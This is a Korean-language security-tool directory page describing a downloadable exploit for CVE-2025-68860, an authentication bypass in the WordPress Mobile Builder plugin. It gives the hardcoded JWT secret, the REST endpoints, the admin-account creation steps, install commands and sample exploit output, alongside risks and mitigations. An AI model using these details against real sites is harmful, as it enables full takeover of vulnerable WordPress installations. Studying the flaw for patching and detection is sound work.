Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-68860 — CVE-2025-68860을 대상으로 하는 WordPress Mobile Builder 플러그인용 익스플로잇 스크립트. 하드코딩된 비밀을 사용하여 위조된 JWT 토큰을 생성하고 관리자로 인증한 후 REST API를 통해 새로운 관리자 계정을 만듭니다. | Kitploit
도구/GitHubGitHub/dedsecteam-blackhat/cve-2025-68860
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthentication
GitHubdedsecteam-blackhat/cve-2025-68860

CVE-2025-68860

CVE-2025-68860을 대상으로 하는 WordPress Mobile Builder 플러그인용 익스플로잇 스크립트. 하드코딩된 비밀을 사용하여 위조된 JWT 토큰을 생성하고 관리자로 인증한 후 REST API를 통해 새로운 관리자 계정을 만듭니다.

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

WordPress Mobile Builder <= 1.4.2 - 인증 우회 (CVE-2025-68860)

설명

WordPress Mobile builder 플러그인 버전 1.4.2 이하는 인증 우회 취약점이 존재하며, 공격자는 기본 시크릿 "example_key"로 유효한 JWT 토큰을 생성하여 관리자(user_id=1)로 인증할 수 있습니다. 해당 토큰을 사용하여 공격자는 새로운 관리자 계정을 생성하고 사이트를 장악할 수 있습니다.

취약점 세부 정보

CVE: CVE-2025-68860

원인: JWT에 하드코딩된 시크릿 키 "example_key" 사용, 적절한 검증 부재.

취약점 위치: Mobile builder 플러그인에서 JWT 인증을 처리하는 파일(예: class-jwt-auth.php)이 기본값 'example_key'인 JWT_SECRET 상수를 사용합니다. 이 시크릿은 설정을 통해 변경할 수 없으므로 공격자는 임의의 user_id에 대한 토큰을 생성할 수 있습니다.

영향: 공격자는 user_id=1(admin)에 대한 토큰을 생성하고 REST API 엔드포인트에 접근하여 관리자 역할의 새 사용자를 생성할 수 있습니다.

CVSS: 높음(점수 8.8) - 네트워크 벡터, 사용자 상호작용 불필요.

익스플로잇 작동 방식

  1. 스크립트가 user_id: 1 (admin) 및 시크릿 "example_key"를 포함한 페이로드로 JWT 토큰을 생성합니다.

  2. 토큰을 사용하여 /wp-json/wp/v2/users/에 접근해 관리자 접근을 확인합니다.

  3. 성공하면 스크립트가 /wp-json/wp/v2/users에 POST 요청을 보내 사용자명 dedsec1337, 비밀번호 admin, 이메일 [email protected], 역할 administrator로 새 사용자를 생성합니다.

  4. 출력에 자격 증명과 API 응답이 표시됩니다.

요구 사항

root@kitploit:~
Python 3.6+

라이브러리: requests, PyJWT, colorama

WordPress 사이트에 Mobile builder 플러그인 버전 <= 1.4.2가 활성화되어 있어야 함.

설치

root@kitploit:~
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt

출력 예시

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 인증 우회 익스플로잇            ║
║ CVE-2025-68860   우선순위: 높음                                  ║
║                    Dedsec Team Exploit                           ║
╚═══════════════════════════════════════════════════════════════════╝
익스플로잇 제공: Dedsec Team Exploit
텔레그램    : @DedsecTeam1337
GitHub      : https://github.com/DedsecTeam-BlackHat

[INFO] CVE-2025-68860 // WordPress Mobile builder 인증 우회
[INFO] 이전의 모든 익스플로잇/설정은 무시되며, 이 벡터만 실행됩니다.
사이트 URL (예: http://target.site): http://localhost/wordpress
[INFO] 관리자(user_id=1)로 JWT 생성 중...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] /wp-json/wp/v2/users/me에서 JWT 테스트 중
[SUCCESS] JWT 유효! 관리자 접근 확인됨.
--------------------------------------------------------------
[INFO] 익스플로잇을 사용하여 관리자 계정 생성 중...
[INFO] 익스플로잇 실행 중, 잠시 기다려 주세요...
[SUCCESS] ✅ 관리자 사용자가 성공적으로 생성되었습니다!

==============[ 새 관리자 자격 증명 ]==============
사용자명 : dedsec1337
비밀번호 : admin
이메일   : [email protected]
===================================================

전체 API 응답:
{
  "id": 3,
  "username": "dedsec1337",
  "name": "dedsec1337",
  "email": "[email protected]",
  "roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] 익스플로잇 완료. 셸을 즐기세요.
...

위험성

  1. 공격자는 새로운 관리자 계정을 생성하고, 모든 WordPress 기능에 접근하며, 악성 플러그인 설치, 콘텐츠 변경, 사용자 데이터 탈취, 또는 추가 공격에 사이트를 이용할 수 있습니다.

  2. 이 취약점은 사전 인증 없이 원격으로 악용될 수 있습니다.

  3. 영향: WordPress 사이트 전체가 손상됩니다.

완화 조치

  1. Mobile builder 플러그인을 최신 버전(>=1.4.3)으로 즉시 업데이트하십시오.

  2. 업데이트가 없는 경우 플러그인을 일시적으로 비활성화하십시오.

  3. 사이트에 의심스러운 사용자가 있는지 확인하십시오.

  4. 웹 애플리케이션 방화벽(WAF)을 사용하여 REST API 엔드포인트에 대한 의심스러운 요청을 차단하십시오.

  5. 임시 조치로 플러그인 코드에서 시크릿 키를 변경하고(가능한 경우) REST API에 대한 접근을 제한하십시오.

도구 다운로드